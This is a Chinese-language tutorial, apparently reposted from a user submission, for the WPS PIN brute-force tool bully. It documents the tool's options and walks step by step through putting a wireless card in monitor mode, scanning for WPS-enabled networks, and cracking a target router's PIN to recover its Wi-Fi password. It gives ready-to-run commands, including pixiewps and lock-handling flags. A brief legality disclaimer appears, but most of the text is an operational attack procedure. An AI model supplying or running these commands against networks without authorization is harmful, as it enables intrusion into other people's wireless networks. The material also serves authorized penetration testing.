bully使用教程
bully是一款用于破解Wi-Fi Protected SetupWPS的工具主要通过暴力破解WPS PIN码来获取无线网络的访问权限。WPS是一种简化Wi-Fi设备连接的协议由于其设计缺陷使得通过暴力破解PIN码来获取网络密钥成为可能。bully工具能够高效地与目标接入点进行WPS交互尝试不同的PIN组合直到找到正确的PIN码进而计算出无线网络的密码。该p命令参数说明必填参数参数描述interface处于监控模式的无线接口需要root权限-b, –bssid macaddr目标接入点的MAC地址-e, –essid string接入点的扩展SSID与-b参数二选一可选参数参数描述-c, –channel N[,N…]接入点的信道或要跳频的信道列表 [b/g]-i, –index N起始PIN索引7或8位数字 [自动]-l, –lockwait N如果接入点锁定WPS等待的秒数 [43]-o, –outfile file消息的输出文件 [标准输出]-p, –pin N起始PIN号码7或8位数字 [自动]-s, –source macaddr源硬件MAC地址 [探测]-u, –luaLua脚本文件-v, –verbosity N详细程度1-41最安静 [3]-w, –workdir pathPIN/会话文件的位置 [~/.bully/]-5, –5ghz在5GHz a/n默认信道列表上跳频 [否]-B, –bruteforce暴力破解WPS PIN校验位 [否]-F, –force即使有警告也强制继续 [否]-S, –sequential顺序PIN不随机化 [否]-T, –test测试模式不注入任何数据包 [否]高级参数参数描述-d, –pixiewps尝试使用pixiewps [否]-a, –acktime N已弃用/忽略 [自动]-r, –retries N未收到确认时重发数据包N次 [2]-m, –m13time N已弃用/忽略 [自动]-t, –timeout N已弃用/忽略 [自动]-1, –pin1delay M,N在M5处每N次nack延迟M秒 [0,1]-2, –pin2delay M,N在M7处每N次nack延迟M秒 [5,1]-A, –noacks禁用对已发送数据包的ACK检查 [否]-C, –nocheck跳过CRC/FCS验证提升性能 [否]-D, –detectlock检测接入点未报告的WPS锁定 [否]-E, –eapfailEAP失败终止每次交换 [否]-L, –lockignore忽略接入点报告的WPS锁定 [否]-M, –m57nackM5/M7超时视为WSC_NACK [否]-N, –nofcs数据包不包含FCS字段 [自动]-P, –probe对非信标接入点使用探测请求 [否]-Q, –wpsinfo使用探测请求收集WPS信息 [否]-R, –radiotap假设存在radiotap头 [自动]-W, –windows7伪装成Windows 7注册器 [否]-Z, –suppress抑制数据包节流算法 [否]-V, –version打印版本信息并退出-h, –help显示此帮助信息使用教程1. 准备工作确保无线网卡支持监控模式和数据包注入并且已安装bully工具。在Kali Linux中可通过以下命令安装sudo apt-get install bully2. 启用监控模式使用airmon-ng工具将无线网卡设置为监控模式sudo airmon-ng start wlan0wlan0为无线网卡名称可通过iwconfig查看启用后通常变为wlan0mon3. 扫描目标网络使用airodump-ng扫描附近开启WPS的无线网络sudo airodump-ng wlan0mon记录目标网络的BSSIDMAC地址、ESSID网络名称和信道CH。可通过查看”PWR”、”Beacons”等判断信号强度选择信号较好的目标。4. 开始破解WPS PIN码使用bully工具针对目标网络进行破解基本命令格式如下sudo bully -b 目标BSSID -c 信道 监控模式接口示例sudo bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon5. 其他常用命令示例指定ESSID进行破解sudo bully -e 目标网络名称 -c 6 wlan0mon从特定PIN码开始破解sudo bully -b AA:BB:CC:DD:EE:FF -c 6 -p 12345670 wlan0mon将结果输出到文件sudo bully -b AA:BB:CC:DD:EE:FF -c 6 -o crack_result.txt wlan0mon使用pixiewps辅助破解针对存在漏洞的设备sudo bully -b AA:BB:CC:DD:EE:FF -c 6 -d wlan0mon6. 破解成功后获取密码当bully成功破解出WPS PIN码后会自动计算出无线网络的密码通常会在输出信息中显示”PSK”字段例如PSK: 12345678此时可使用该密码连接目标无线网络。7. 结束监控模式破解完成后关闭无线网卡的监控模式sudo airmon-ng stop wlan0mon并重启网络服务sudo systemctl restart NetworkManager8. 注意事项破解行为需在合法授权的前提下进行未经允许破解他人无线网络属于违法行为。部分无线路由器在多次错误尝试后会锁定WPS功能此时bully会自动等待锁定时间默认43秒后继续。信号强度对破解成功率影响较大尽量选择信号强、距离近的目标。使用-p参数指定起始PIN码时需注意PIN码为7或8位数字。结合-pixiewps-d参数可提高对某些存在漏洞的无线路由器的破解效率。破解过程可能需要较长时间耐心等待尤其是目标路由器有WPS锁定机制时。9. 常见问题及解决方法9.1 无法启用监控模式尝试关闭可能干扰的进程sudo airmon-ng check kill若仍有问题检查无线网卡是否支持监控模式更换支持的网卡。9.2 破解过程中频繁出现锁定可增加锁定等待时间使用-l参数sudo bully -b AA:BB:CC:DD:EE:FF -c 6 -l 60 wlan0mon9.3 无法获取目标网络信息确认目标网络开启了WPS功能且处于扫描到的信道上可尝试使用-Q参数收集WPS信息sudo bully -b AA:BB:CC:DD:EE:FF -c 6 -Q wlan0mon
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2454724.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!